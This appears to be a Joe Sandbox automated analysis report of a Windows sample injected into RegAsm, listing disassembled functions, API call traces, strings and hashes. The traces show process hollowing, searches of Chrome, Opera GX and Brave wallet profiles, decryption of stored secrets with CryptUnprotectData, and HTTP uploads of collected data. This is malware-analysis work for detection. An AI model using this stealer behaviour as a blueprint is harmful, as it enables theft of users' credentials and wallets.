GetProcAddress.KERNEL32 ref: 00419232
GetProcAddress.KERNEL32 ref: 00419249
GetProcAddress.KERNEL32(75A50000), ref: 00419268
GetProcAddress.KERNEL32 ref: 0041927F
GetProcAddress.KERNEL32 ref: 00419296
GetProcAddress.KERNEL32 ref: 004192AD
GetProcAddress.KERNEL32 ref: 004192C4
GetProcAddress.KERNEL32 ref: 004192DB
GetProcAddress.KERNEL32 ref: 004192F2
GetProcAddress.KERNEL32 ref: 00419309
GetProcAddress.KERNEL32 ref: 00419320
GetProcAddress.KERNEL32(75070000), ref: 0041933B
GetProcAddress.KERNEL32 ref: 00419352
GetProcAddress.KERNEL32 ref: 00419369
GetProcAddress.KERNEL32 ref: 00419380
GetProcAddress.KERNEL32 ref: 00419397
GetProcAddress.KERNEL32(74E50000), ref: 004193B2
GetProcAddress.KERNEL32 ref: 004193C9
GetProcAddress.KERNEL32(75320000), ref: 004193E4
GetProcAddress.KERNEL32 ref: 004193FB
GetProcAddress.KERNEL32(6F080000), ref: 0041941A
GetProcAddress.KERNEL32 ref: 00419431
GetProcAddress.KERNEL32 ref: 00419448
GetProcAddress.KERNEL32 ref: 0041945F
GetProcAddress.KERNEL32 ref: 00419476
GetProcAddress.KERNEL32 ref: 0041948D
GetProcAddress.KERNEL32 ref: 004194A4
GetProcAddress.KERNEL32 ref: 004194BB
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 004194D1
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 004194E7
GetProcAddress.KERNEL32(74E00000), ref: 00419502
GetProcAddress.KERNEL32 ref: 00419519
GetProcAddress.KERNEL32 ref: 00419530
GetProcAddress.KERNEL32 ref: 00419547
GetProcAddress.KERNEL32(74DF0000), ref: 00419562
GetProcAddress.KERNEL32(6CA10000), ref: 0041957D
GetProcAddress.KERNEL32 ref: 00419594
GetProcAddress.KERNEL32 ref: 004195AB
GetProcAddress.KERNEL32 ref: 004195C2
GetProcAddress.KERNEL32(6C880000,SymMatchString), ref: 004195DC

Strings

WriteProcessMemory, xrefs: 00418F4B
SetThreadContext, xrefs: 00418F61
CreateProcessA, xrefs: 00418EDD
InternetSetOptionA, xrefs: 004194D7
ResumeThread, xrefs: 00418F35
SymMatchString, xrefs: 004195D6
HttpQueryInfoA, xrefs: 004194C1
ReadProcessMemory, xrefs: 00418F09
dbghelp.dll, xrefs: 00418FFF
GetThreadContext, xrefs: 00418EF3
VirtualAllocEx, xrefs: 00418F1F

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 2238633743-2740034357
Opcode ID: 2f514aa4515eb04d515bdb042a0ac87ba7fa7662099484ee2dbd85a5f1dc5103
Instruction ID: 8fd5fbfe85fd65639e2b99cb818a07d7a24d31bb6aca5b434a5a80c0a52a7b57
Opcode Fuzzy Hash: 2f514aa4515eb04d515bdb042a0ac87ba7fa7662099484ee2dbd85a5f1dc5103
Instruction Fuzzy Hash: BD521B7D490284EFEB565F61FD189653BB7F70BB413007026EA198A630EB3248E9EF54

Function 0040D2FF Relevance: 44.7, APIs: 19, Strings: 6, Instructions: 924
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040D304

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

FindFirstFileA.KERNEL32(00000000,?,00426C27,00426C26,00000000,?,00426D70,?,?,00426C23,?,?,00000000), ref: 0040D3A5
StrCmpCA.SHLWAPI(?,00426D74,?,?,00000000), ref: 0040D40C
StrCmpCA.SHLWAPI(?,00426D78,?,?,00000000), ref: 0040D426
StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00426D7C,?,?,00426C2A,?,?,00000000), ref: 0040D4D7

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

Brave, xrefs: 0040D6C9
Preferences, xrefs: 0040D6E8
Opera GX, xrefs: 0040D4C6
H, xrefs: 0040DFD2
Google Chrome, xrefs: 0040DCAD
\BraveWallet\Preferences, xrefs: 0040D81A

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 3869166975-1816240570
Opcode ID: d91f2a67ca89b6b1106c9fc733d4a4b511ee9e20b1dc9e3ad6d0ff175d53c89e
Instruction ID: 53ddc256561e8616ae8c2f814ecd0b30af94b98153ab47dec96f8554ad320668
Opcode Fuzzy Hash: d91f2a67ca89b6b1106c9fc733d4a4b511ee9e20b1dc9e3ad6d0ff175d53c89e
Instruction Fuzzy Hash: 9282A570D0028DEADF15EBB5C956BDD7BB46F19308F10409EE449A31C2DBB81788CBA6

Function 004041B2 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 170
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004041B7

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041FE
RtlAllocateHeap.NTDLL(00000000), ref: 00404205
InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404224
StrCmpCA.SHLWAPI(?), ref: 00404238
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040425C
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404292
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042B6
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042C1
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004042DF
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404337
InternetCloseHandle.WININET(00000000), ref: 00404369
InternetCloseHandle.WININET(?), ref: 00404372
InternetCloseHandle.WININET(?), ref: 0040437B

Strings

GET, xrefs: 0040428A

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET
API String ID: 1687531150-1805413626
Opcode ID: 4ee50e438f1c7c7b70479a0ee2aa32a27f1256c7f2f2642d8561a6bee16b11f5
Instruction ID: 1523c0f0f9ef9ef31d6cb1d3877620ea5c7cf15edcd8f0a38c23a14e42f138c4
Opcode Fuzzy Hash: 4ee50e438f1c7c7b70479a0ee2aa32a27f1256c7f2f2642d8561a6bee16b11f5
Instruction Fuzzy Hash: 375180B2900219AFDF10EFE0DC85AEFBBB9EB49344F00512AFA11B6190D7745E85CB65

Function 1B694CF0 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 461
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 1B694EE1

Strings

exclusive, xrefs: 1B694E81
delayed %dms for lock/sharing conflict at line %d, xrefs: 1B694FB5
winOpen, xrefs: 1B695110
psow, xrefs: 1B6951F5

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: 421658efa63a0565524c0a53a0b3e91a1b6a9b9b43b3e3cd593fb41c39c78513
Instruction ID: 036edba86511129cc82f3579e46b17062ea7e51350922e8e56c03acb78bdaf1e
Opcode Fuzzy Hash: 421658efa63a0565524c0a53a0b3e91a1b6a9b9b43b3e3cd593fb41c39c78513
Instruction Fuzzy Hash: 29F1B2F19443128FDB188F24E8857EB77E4FBA4B15F00092AF989C7291D735D948CB96

Function 004114AC Relevance: 9.1, APIs: 6, Instructions: 67commemoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004114B1
CoCreateInstance.OLE32(00427E9C,00000000,00000001,004274E0,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004114D8
SysAllocString.OLEAUT32(?), ref: 004114E5
_wtoi64.MSVCRT ref: 00411520
SysFreeString.OLEAUT32(?), ref: 00411533
SysFreeString.OLEAUT32(00000000), ref: 0041153A

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prologInstance_wtoi64
String ID:
API String ID: 1816492551-0
Opcode ID: a8e7957c78a727629aea68f0988402db0db1588152c17184521d3dab4a7bb248
Instruction ID: 75d5262a5ef85334d4fdbac522390c20b0d0e53c3d084ce78bcdfae8cff9a32f
Opcode Fuzzy Hash: a8e7957c78a727629aea68f0988402db0db1588152c17184521d3dab4a7bb248
Instruction Fuzzy Hash: DB21A271A00215AFCB00DFA4DD859EE7BBAFF88304B64846AF506E7220D7758E41CB65

Function 004110AB Relevance: 7.6, APIs: 5, Instructions: 70processCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004110B0

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004110EB
Process32First.KERNEL32(00000000,00000128), ref: 004110FC
Process32Next.KERNEL32(?,00000128), ref: 00411164
CloseHandle.KERNEL32(?,?,00000000), ref: 00411171

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 599723951-0
Opcode ID: 7266735b3a3e403a41266947b10734dfac143fe2dbbac3da0ad901e66055c79d
Instruction ID: 1ed9a39e5d2d601f1e50169a465b6ff05849cc7a8e262af08b7d1ab23e163f8b
Opcode Fuzzy Hash: 7266735b3a3e403a41266947b10734dfac143fe2dbbac3da0ad901e66055c79d
Instruction Fuzzy Hash: 1C219D71A00118ABCB00EFA9CD49AEEFBBDAF49304F00005EE615E3290DB785A84CB64

Function 00410A7A Relevance: 6.0, APIs: 4, Instructions: 29memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,004277CC,00000000,?,00000000,00000000,?,AV: ), ref: 00410A8B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004277CC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 00410A92
GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004277CC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 00410AA1
wsprintfA.USER32 ref: 00410ABF

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 47b4a5817eba57c796c6bb157fcd3d2f0eb3e47e4af8501f7c0668457901a7a2
Instruction ID: 1b384b84733431d65dbfc00043cc75a1cb174a25b2dcdb3cb3d5343f01a3f245
Opcode Fuzzy Hash: 47b4a5817eba57c796c6bb157fcd3d2f0eb3e47e4af8501f7c0668457901a7a2
Instruction Fuzzy Hash: 39E02271701320BBEB1067A8EC0EFCA3B6D9B03324F000352FB11D71D0D6B49A8087A1

Function 00406DE2 Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406E05
LocalAlloc.KERNEL32(00000040,?,?), ref: 00406E1D
LocalFree.KERNEL32(?), ref: 00406E3B

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 4b839b71d885c81ae38dd3ce376420dd489cb0e07117725e821a15ba944ecf27
Instruction ID: 31242817ca6352487266458761e3266df8a46d8bac03d0caaf7d33f065c7a4dc
Opcode Fuzzy Hash: 4b839b71d885c81ae38dd3ce376420dd489cb0e07117725e821a15ba944ecf27
Instruction Fuzzy Hash: 6E011DBAA00218AFDB10EFA8DC488DEBBB9EF49210B104566FA15E7210D67599908B54

Function 004109B3 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041872B,00427716), ref: 004109BF
HeapAlloc.KERNEL32(00000000,?,?,?,0041872B,00427716), ref: 004109C6
GetUserNameA.ADVAPI32(00000000,?), ref: 004109DA

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: ec10496c7ba635d81c30e7e5579b449b5dcfa1ed61ec646b112e5ff77e50cc81
Instruction ID: 23da9cb591625eb699afeeb93f5d98951b006e77eae846a8e77bae90fefa4d1a
Opcode Fuzzy Hash: ec10496c7ba635d81c30e7e5579b449b5dcfa1ed61ec646b112e5ff77e50cc81
Instruction Fuzzy Hash: 01D05EB6700204FBD710DFA5DC0DE9ABBBCEB84756F400066FA02D2294DAF4DA058A34

Function 00410C69 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 00410C76
wsprintfA.USER32 ref: 00410C8B

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 05d4b43a60acb931d1e1f7c9c9c25cfd6f9345003d8e03c5eea44a45e3b757ab
Instruction ID: 642fcfc0fb5bf5d70228a7f3db009e3336bda0fc9ba0a653cfecae7bc2f492f8
Opcode Fuzzy Hash: 05d4b43a60acb931d1e1f7c9c9c25cfd6f9345003d8e03c5eea44a45e3b757ab
Instruction Fuzzy Hash: 44D05B7580011DD7CF10D7D0FD4998977BCAB04208F4001A1DB00F2080E674EA5DCBD5

Function 004043AD Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 764
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004043B2

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404432

Part of subcall function 00411B94: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411BB8
Part of subcall function 00411B94: GetProcessHeap.KERNEL32(00000000,?,?,00404426,?,?,?,?,?,?,?,?,00000000), ref: 00411BC5
Part of subcall function 00411B94: HeapAlloc.KERNEL32(00000000,?,00404426,?,?,?,?,?,?,?,?,00000000), ref: 00411BCC

StrCmpCA.SHLWAPI(?,00426987,00426983,0042697B,00426977), ref: 004044A4
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004045E9
HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404623
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404647

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00426A40,00000000,?,?,00000000), ref: 00404B42
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404B54
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B66
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404B6D
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404B7F
memcpy.MSVCRT ref: 00404B92
lstrlenA.KERNEL32(00000000,?,?), ref: 00404BA9
memcpy.MSVCRT ref: 00404BB3
lstrlenA.KERNEL32(00000000), ref: 00404BC4
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404BDD
memcpy.MSVCRT ref: 00404BEA
